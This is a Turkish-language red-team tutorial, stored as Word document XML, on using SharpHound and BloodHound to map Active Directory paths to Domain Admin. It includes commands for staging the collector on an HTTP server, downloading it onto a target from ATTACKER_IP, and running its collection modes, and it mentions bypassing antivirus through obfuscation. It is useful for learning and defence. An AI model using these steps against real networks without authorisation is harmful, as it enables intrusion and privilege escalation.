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2F634" w14:textId="512CA142" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64"/>
    <w:p w14:paraId="7E9BF6D0" w14:textId="3817597B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🕵️</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>♂️</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SHARPHOUND </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4058862B" w14:textId="38333ABE" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64"/>
    <w:p w14:paraId="1F1FFC29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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. SharpHound Nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291970E3" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SharpHound</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t>, Active Directory ağlarında kullanıcılar, gruplar, bilgisayarlar ve izinler arasındaki ilişkileri toplamak için kullanılan bir bilgi toplama aracıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C6C96" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t xml:space="preserve"> SharpHound, </w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t xml:space="preserve"> adlı grafiksel analiz aracının veri toplayıcısıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:br/>
        <w:t>BloodHound ile birlikte kullanıldığında:</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t xml:space="preserve"> Sald</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>ı</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>ı</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t xml:space="preserve"> yollar</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>ı</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t xml:space="preserve"> analiz edilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t xml:space="preserve"> En k</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>ı</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t>sa yetki y</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>ü</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t>kseltme rotalar</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>ı</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t xml:space="preserve"> bulunur</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t xml:space="preserve"> Domain Admin'e giden ili</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>ş</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t xml:space="preserve">kiler </w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>çı</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t>kar</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>ı</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>ı</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AE9235" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:pict w14:anchorId="631E5833">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2BBB51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🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. SharpHound’un Temel Özellikleri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8"/>
        <w:gridCol w:w="4335"/>
      </w:tblGrid>
      <w:tr w:rsidR="00094A64" w:rsidRPr="00094A64" w14:paraId="74BF5F50" w14:textId="77777777" w:rsidTr="00094A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BDF7E1" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00094A64">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Özellik</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21DB4A55" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00094A64">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Açıklama</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00094A64" w:rsidRPr="00094A64" w14:paraId="75D70266" w14:textId="77777777" w:rsidTr="00094A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8885B" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
            <w:r w:rsidRPr="00094A64">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔍</w:t>
            </w:r>
            <w:r w:rsidRPr="00094A64">
              <w:t xml:space="preserve"> AD ilişkilerini tarar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E53F47B" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
            <w:r w:rsidRPr="00094A64">
              <w:t>Kullanıcı-bilgisayar-grup ilişkilerini çıkarır</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00094A64" w:rsidRPr="00094A64" w14:paraId="77EF4F2F" w14:textId="77777777" w:rsidTr="00094A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3FCAA" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
            <w:r w:rsidRPr="00094A64">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🧠</w:t>
            </w:r>
            <w:r w:rsidRPr="00094A64">
              <w:t xml:space="preserve"> Graph Database ile uyumlu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6680D81A" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
            <w:r w:rsidRPr="00094A64">
              <w:t>BloodHound ile görsel analiz yapılır</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00094A64" w:rsidRPr="00094A64" w14:paraId="2A502895" w14:textId="77777777" w:rsidTr="00094A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DB3F0" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
            <w:r w:rsidRPr="00094A64">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🚫</w:t>
            </w:r>
            <w:r w:rsidRPr="00094A64">
              <w:t xml:space="preserve"> Antivirüs tespiti yaygındır</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32ACCD63" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
            <w:r w:rsidRPr="00094A64">
              <w:t>Obfuscation ile bypass yapılabilir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00094A64" w:rsidRPr="00094A64" w14:paraId="09840705" w14:textId="77777777" w:rsidTr="00094A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198E5" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
            <w:r w:rsidRPr="00094A64">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🧪</w:t>
            </w:r>
            <w:r w:rsidRPr="00094A64">
              <w:t xml:space="preserve"> Red Team'de aktif kullanılır</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69C36EF1" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
            <w:r w:rsidRPr="00094A64">
              <w:t>Yetki yükseltme stratejileri belirlemek için</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="290DFAC6" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:pict w14:anchorId="1E2A8042">
          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="185A3B00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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. SharpHound Kullanımı (Kali'den Windows hedefe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589623E6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🔽</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. BloodHound &amp; Neo4j Kurulumu (Kali):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EC118A" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05698C97" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>sudo apt install bloodhound neo4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D432BD6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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Neo4j Veritabanını başlat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F5864F" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>neo4j console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2E6F2C" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>BloodHound'u aç:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126BC919" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0E7CF4" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:pict w14:anchorId="5F8734BF">
          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC714F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lastRenderedPageBreak/>
        <w:t>🔽</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. SharpHound Collector’ı hedef sisteme aktarmak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3C748" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>SharpHound Windows içindir, çalıştırılacağı yer hedef makinedir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C30D7FE" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>GitHub’dan indir:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DB0604" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>wget https://github.com/BloodHoundAD/SharpHound/releases/latest/download/SharpHound.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558279A7" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>HTTP sunucusu kur:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0981F056" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EDBF99" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>Hedef sistemden indir:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DC3ECD" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>Invoke-WebRequest -Uri http://ATTACKER_IP/SharpHound.exe -OutFile SharpHound.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23621FBB" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:pict w14:anchorId="60FF7C3F">
          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="066819EF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🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. SharpHound Komutları</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B7A6DC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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tam bilgi toplama (en kapsamlı):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A89393D" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>SharpHound.exe -c All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D65A18B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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sadece oturum ilişkileri:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF316CD" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>SharpHound.exe -c Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBEB759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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LDAP üzerinden sadece kullanıcı bilgisi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058CBB5C" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>SharpHound.exe -c ACL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC6CBA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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Çıktıları belirli klasöre kaydet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E3C6CE" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>SharpHound.exe -c All -o .\loot\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454E9F42" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>Oluşan .json veya .zip dosyası BloodHound arayüzüne aktarılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74409053" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:pict w14:anchorId="444E5634">
          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEDA8D3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📊</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. BloodHound ile Görsel Analiz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17729D6B" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Import Data → zip dosyasını yükle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230DC19A" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00094A64">
        <w:t>“Find all Domain Admins” veya “Shortest Path to DA” gibi hazır sorgular kullanılır</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C8FF78" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00094A64">
        <w:t>Kullanıcıdan Domain Admin’e giden yollar analiz edilir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD8637" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:pict w14:anchorId="0C4DD027">
          <v:rect id="_x0000_i1098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7712F432" w14:textId="77777777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🖥️</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. Örnek Terminal Çıktısı (Windows Hedefte)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F2B0F" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:lastRenderedPageBreak/>
        <w:t>[+] Flags: All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593B2E6" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>[+] Output directory: .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42C9DF" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>[+] Resolved domain: CORP.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334718D9" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>[+] Found 130 users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49911672" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>[+] Found 240 computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E16F68B" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>[+] Found 95 sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FD1840" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r w:rsidRPr="00094A64">
        <w:t>[+] Finished in 00:00:34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55981C5A" w14:textId="2B43F92E" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34EDCFEC" wp14:editId="6EAA00DB">
            <wp:extent cx="5760720" cy="5760720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1870884088" name="Resim 1" descr="Görsel üretil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Görsel üretild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16BF" w14:textId="5BBDB27F" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64"/>
    <w:p w14:paraId="0A207535" w14:textId="46A2A196" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00094A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Öğrenim Kazanımları</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3D213D" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00094A64">
        <w:lastRenderedPageBreak/>
        <w:t>Active Directory topolojisini analiz etmeyi öğrenme</w:t>
      </w:r>
    </w:p>
